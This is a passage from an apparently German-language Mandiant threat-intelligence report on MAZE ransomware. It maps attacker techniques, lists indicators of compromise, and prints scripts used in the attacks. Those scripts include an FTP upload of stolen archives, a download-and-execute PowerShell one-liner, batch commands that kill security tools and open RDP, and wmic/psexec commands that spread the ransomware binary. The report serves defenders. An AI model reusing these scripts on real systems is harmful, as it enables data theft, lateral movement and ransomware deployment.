Ausweitung der Zugriffsrechte	T1055: Codeinjektion in Prozesse T1078: Gültige Konten
Umgehung von Abwehrmaßnahmen	T1055: Codeinjektion in Prozesse T1078: Gültige Konten T1116: Code-Signing T1089: Deaktivierung von Sicherheitstools T1202: Indirekte Befehlsausführung T1112: Registry-Manipulation T1027: Verschleierung von Dateien oder Daten T1108: Redundanter Zugriff T1064: Scripting
Diebstahl von Anmeldedaten	T1003: Ausspähen von Zugangsdaten mit einem Passwort-Dumper
Ausspähung	T1087: Kontoerfassung T1482: Ermittlung der Vertrauensstellung von Domains T1083: Datei- und Verzeichniserfassung T1069: Ermittlung der Berechtigungsgruppen T1018: Identifizierung von Remotesystemen
Ausbreitung im System	T1097: Anmeldeversuche mit der Pass-the-Ticket-Methode T1076: Remote Desktop Protocol (RDP) T1105: Kopieren von Dateien per Fernzugriff T1077: Windows-Administratorfreigaben
Datenerfassung	T1074: Zusammentragen der Daten T1039: Daten aus Netzwerkfreigaben
Command-and-Control-Aktivitäten	T1043: Häufig verwendeter Port T1219: Tools für den Fernzugriff T1105: Kopieren von Dateien per Fernzugriff T1071: Standardprotokoll für die Anwendungsebene T1032: Standard-Verschlüsselungsprotokoll
Datenausschleusung	T1002: Komprimierte Daten
Störung des Betriebs	T1486: Verschlüsselung der Daten zur Störung des Betriebs T1490: Verhinderung der Systemwiederherstellung T1489: Dienstunterbrechung

Skripte, die im Rahmen von MAZE-Angriffen ausgeführt wurden

function Enum-UsersFolders($PathEnum)
{
$foldersArr = 'Desktop','Downloads','Documents','AppData/Roaming','AppData/Local'

Get-ChildItem -Path $PathEnum'/c$' -ErrorAction SilentlyContinue
Get-ChildItem -Path $PathEnum'/c$/Program Files' -ErrorAction SilentlyContinue
Get-ChildItem -Path $PathEnum'/c$/Program Files (x86)' -ErrorAction SilentlyContinue

foreach($Directory in Get-ChildItem -Path $PathEnum'/c$/Users' -ErrorAction SilentlyContinue) {

foreach($SeachDir in $foldersArr) {
Get-ChildItem -Path $PathEnum'/c$/Users/'$Directory'/'$SeachDir -ErrorAction SilentlyContinue
}
}
}

PowerShell-Skript zur Erstellung einer Liste sämtlicher Verzeichnisse

$Dir="C:/Windows/Temp/"
#ftp server
$ftp = "ftp://<IP Address>/incoming/"
$user = "<username>"
$pass = "<password>"
$webclient = New-Object System.Net.WebClient
$webclient.Credentials = New-Object System.Net.NetworkCredential($user,$pass)
#list every sql server trace file
foreach($item in (dir $Dir "*.7z")){
"Uploading $item..."
$uri = New-Object System.Uri($ftp+$item.Name)
$webclient.UploadFile($uri, $item.FullName)
}

Entschlüsseltes PowerShell-Skript für den FTP-Upload

powershell -nop -exec bypass IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:43984/'); Add-FtpFile -ftpFilePath "ftp://<IP Address>/cobalt_uploads/<file name>" -localFile "<local file path>\ <file name> " -userName "<username>" -password "<password>"

Entschlüsseltes PowerShell-Skript für den FTP-Upload

[…]
echo 7
echo 7
taskkill /im csrss_tc.exe /f
taskkill /im kwsprod.exe /f
taskkill /im avkwctl.exe /f
taskkill /im rnav.exe /f
taskkill /im crssvc.exe /f
sc config CSAuth start= disabled
taskkill /im vsserv.exe /f
taskkill /im ppmcativedetection.exe /f
[…]
taskkill /im sahookmain.exe /f
taskkill /im mcinfo.exe /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh advfirewall firewall set rule group="remote desktop" new enable=Ye
c:\windows\temp\sss.exe

Auszug aus einer Windows-Stapelverarbeitungsdatei mit Kill-Befehlen

start copy sss.exe \\<internal IP>\c$\windows\temp\
start copy sss.exe \\<internal IP>\c$\windows\temp\

start copy windows.bat \\<internal IP>\c$\windows\temp\
start copy windows.bat \\<internal IP>\c$\windows\temp\

start wmic /node:"<internal IP>" /user:"<DOMAIN\adminaccount>" /password:"<password>" process call create "c:\windows\temp\sss.exe"

start wmic /node:"<internal IP>" /user:"<DOMAIN\adminaccount>" /password:"<password>" process call create "c:\windows\temp\sss.exe"

start wmic /node:"<internal IP>" /user:"<DOMAIN\adminaccount>" /password:"<password>" process call create "cmd.exe /c c:\windows\temp\windows.bat"

start wmic /node:"<internal IP>" /user:"<DOMAIN\adminaccount>" /password:"<password>" process call create "cmd.exe /c c:\windows\temp\windows.bat"

start wmic /node:"<internal IP>" /user:"<DOMAIN\adminaccount>" /password:"<password>" process call create "cmd.exe /c copy \\<internal IP>\c$\windows\temp\sss.exe c:\windows\temp\"

start wmic /node:"<internal IP>" /user:"<DOMAIN\adminaccount>" /password:"<password>" process call create "cmd.exe /c copy \\<internal IP>\c$\windows\temp\sss.exe c:\windows\temp\"

start wmic /node:"<internal IP>" /user:"<DOMAIN\adminaccount>" /password:"<password>" process call create "cmd.exe /c copy \\<internal IP>\c$\windows\temp\windows.bat c:\windows\temp\"

start wmic /node:"<internal IP>" /user:"<DOMAIN\adminaccount>" /password:"<password>" process call create "cmd.exe /c copy \\<internal IP>\c$\windows\temp\windows.bat c:\windows\temp\"

start psexec.exe \\<internal IP> -u <DOMAIN\adminaccount> -p "<password>" -d -h -r rtrsd -s -accepteula -nobanner c:\windows\temp\sss.exe

start psexec.exe \\<internal IP> -u <DOMAIN\adminaccount> -p "<password>" -d -h -r rtrsd -s -accepteula -nobanner c:\windows\temp\windows.bat

start psexec.exe \\<internal IP> -u <DOMAIN\adminaccount> -p "<password>" -d -h -r rtrsd -s -accepteula -nobanner c:\windows\temp\windows.bat

Beispielbefehle aus einem Skript zur Verbreitung von MAZE

@echo off
del done.txt
del offline.txt
rem Loop thru list of computer names in file specified on command-line
for /f %%i in (%1) do call :check_machine %%i
goto end
:check_machine
rem Check to see if machine is up.
ping -n 1 %1|Find "TTL=" >NUL 2>NUL
if errorlevel 1 goto down
echo %1
START cmd /c "copy [Location of MAZE binary] \\%1\c$\windows\temp && exit"
timeout 1 > NUL
echo %1 >> done.txt
rem wmic /node:"%1" process call create "regsvr32.exe /i C:\windows\temp\[MAZE binary name]" >> done.txt
START "" cmd /c "wmic /node:"%1" process call create "regsvr32.exe /i C:\windows\temp\[MAZE binary name]" && exit"
goto end
:down
rem Report machine down
echo %1 >> offline.txt
:end

Beispielsskript zur Verbreitung von MAZE

Gefahrenindikatoren

Hashwerte für MAZE-Schadcode	064058cf092063a5b69ed8fd2a1a04fe 0f841c6332c89eaa7cac14c9d5b1d35b 108a298b4ed5b4e77541061f32e55751 11308e450b1f17954f531122a56fae3b 15d7dd126391b0e7963c562a6cf3992c 21a563f958b73d453ad91e251b11855c 27c5ecbb94b84c315d56673a851b6cf9 2f78ff32cbb3c478865a88276248d419 335aba8d135cc2e66549080ec9e8c8b7 3bfcba2dd05e1c75f86c008f4d245f62 46b98ee908d08f15137e509e5e69db1b 5774f35d180c0702741a46d98190ff37 5df79164b6d0661277f11691121b1d53 658e9deec68cf5d33ee0779f54806cc2 65cf08ffaf12e47de8cd37098aac5b33 79d137d91be9819930eeb3876e4fbe79 8045b3d2d4a6084f14618b028710ce85 8205a1106ae91d0b0705992d61e84ab2 83b8d994b989f6cbeea3e1a5d68ca5d8 868d604146e7e5cb5995934b085846e3 87239ce48fc8196a5ab66d8562f48f26 89e1ddb8cc86c710ee068d6c6bf300f4 910aa49813ee4cc7e4fa0074db5e454a 9eb13d56c363df67490bcc2149229e4c a0c5b4adbcd9eb6de9d32537b16c423b a3a3495ae2fc83479baeaf1878e1ea84 b02be7a336dcc6635172e0d6ec24c554 b40a9eda37493425782bda4a3d9dad58 b4d6cb4e52bb525ebe43349076a240df b6786f141148925010122819047d1882 b93616a1ea4f4a131cc0507e6c789f94 bd9838d84fd77205011e8b0c2bd711e0 be537a66d01c67076c8491b05866c894 bf2e43ff8542e73c1b27291e0df06afd c3ce5e8075f506e396ee601f2757a2bd d2dda72ff2fbbb89bd871c5fc21ee96a d3eaab616883fcf51dcbdb4769dd86df d552be44a11d831e874e05cadafe04b6 deebbea18401e8b5e83c410c6d3a8b4e dfa4631ec2b8459b1041168b1b1d5105 e57ba11045a4b7bc30bd2d33498ef194 e69a8eb94f65480980deaf1ff5a431a6 ef95c48e750c1a3b1af8f5446fa04f54 f04d404d84be66e64a584d425844b926 f457bb5060543db3146291d8c9ad1001 f5ecda7dd8bb1c514f93c09cea8ae00d f83cef2bf33a4d43e58b771e81af3ecc fba4cbb7167176990d5a8d24e9505f71
Von MAZE kontaktierte IP-Adressen	91.218.114.11 91.218.114.25 91.218.114.26 91.218.114.31 91.218.114.32 91.218.114.37 91.218.114.38 91.218.114.4 91.218.114.77 91.218.114.79 92.63.11.151 92.63.15.6 92.63.15.8 92.63.17.245 92.63.194.20 92.63.194.3 92.63.29.137 92.63.32.2 92.63.32.52 92.63.32.55 92.63.32.57 92.63.37.100 92.63.8.47
Für MAZE-Angriffe genutzte Domains	aoacugmutagkwctu[.]onion mazedecrypt[.]top mazenews[.]top newsmaze[.]top
URLs für den MAZE-Download	http://104.168.174.32/wordupd_3.0.1.tmp http://104.168.198.208/wordupd.tmp http://104.168.201.35/dospizdos.tmp http://104.168.201.47/wordupd.tmp http://104.168.215.54/wordupd.tmp http://149.56.245.196/wordupd.tmp http://192.119.106.235/mswordupd.tmp http://192.119.106.235/officeupd.tmp http://192.99.172.143/winupd.tmp http://54.39.233.188/win163.65.tmp http://91.208.184.174:8079/windef.exe http://agenziainformazioni[.]icu/wordupd.tmp http://www.download-invoice[.]site/Invoice_29557473.exe
Hashwerte schädlicher Dokumente	1a26c9b6ba40e4e3c3dce12de266ae10 53d5bdc6bd7904b44078cf80e239d42b 79271dc08052480a578d583a298951c5 a2d631fcb08a6c840c23a8f46f6892dd ad30987a53b1b0264d806805ce1a2561 c09af442e8c808c953f4fa461956a30f ee26e33725b14850b1776a67bd8f2d0a
C2-Server und -Domains für BEACON	173.209.43.61 193.36.237.173 37.1.213.9 37.252.7.142 5.199.167.188 checksoffice[.]me drivers.updatecenter[.]icu plaintsotherest[.]net thesawmeinrew[.]net updates.updatecenter[.]icu
Hashwerte der Binärdateien von Cobalt Strike	7507fe19afbda652e9b2768c10ad639f a93b86b2530cc988f801462ead702d84 4f57e35a89e257952c3809211bef78ea bad6fc87a98d1663be0df23aedaf1c62 f5ef96251f183f7fc63205d8ebf30cbf c818cc38f46c604f8576118f12fd0a63 078cf6db38725c37030c79ef73519c0c c255daaa8abfadc12c9ae8ae2d148b31 1fef99f05bf5ae78a28d521612506057 cebe4799b6aff9cead533536b09fecd1 4ccca6ff9b667a01df55326fcc850219 bad6fc87a98d1663be0df23aedaf1c62
C2-Server für Meterpreter	5.199.167.188
Hashwerte anderer relevanter Dateien	3A5A9D40D4592C344920DD082029B362 (im Rahmen von MAZE-Angriffen eingesetztes Skript) 76f8f28bd51efa03ab992fdb050c8382 (Artefakt der Ausführung von MAZE) b5aa49c1bf4179452a85862ade3ef317 (Windows-Stapelverarbeitungsdatei mit Kill-Befehlen) fad3c6914d798e29a3fd8e415f1608f4 (im Rahmen von MAZE-Angriffen eingesetztes Skript)
Von den Angreifern genutzte Tools & Dienstprogramme	27304b246c7d5b4e149124d5f93c5b01 (PsExec) 42badc1d2f03a8b1e4875740d3d49336 (7zip) 75b55bb34dac9d02740b9ad6b6820360 (PsExec) 9b02dd2a1a15e94922be3f85129083ac (AdFind) c621a9f931e4ebf37dace74efcce11f2 (SMBTools) f413b4a2242bb60829c9a470eea4dfb6 (winRAR)
Für den E-Mail-Versand genutzte Domains	att-customer[.]com att-information[.]com att-newsroom[.]com att-plans[.]com bezahlen-1und1[.]icu bzst-info[.]icu bzst-inform[.]icu bzstinfo[.]icu bzstinform[.]icu canada-post[.]icu canadapost-delivery[.]icu canadapost-tracking[.]icu hilfe-center-1und1[.]icu hilfe-center-internetag[.]icu trackweb-canadapost[.]icu
Registrantenadresse der für den E-Mail-Versand genutzten Domains	[email protected] [email protected]

Das Team von Mandiant Threat Intelligence veranstaltet am Donnerstag, dem 21. Mai 2020 um 17 Uhr MESZ ein exklusives Webinar, das Ihnen aktuelle Erkenntnisse und Informationen über die von der Ransomware MAZE ausgehende Bedrohung liefert und den Teilnehmern außerdem die Gelegenheit bietet, eigene Fragen zu stellen. Melden Sie sich noch heute an und sichern Sie sich Ihren Platz.

Link to RSS feed

Mandiant Advantage

Mandiant-Lösungen

Services von Mandiant

Cyber Threat Intelligence

Resource Center

Unternehmen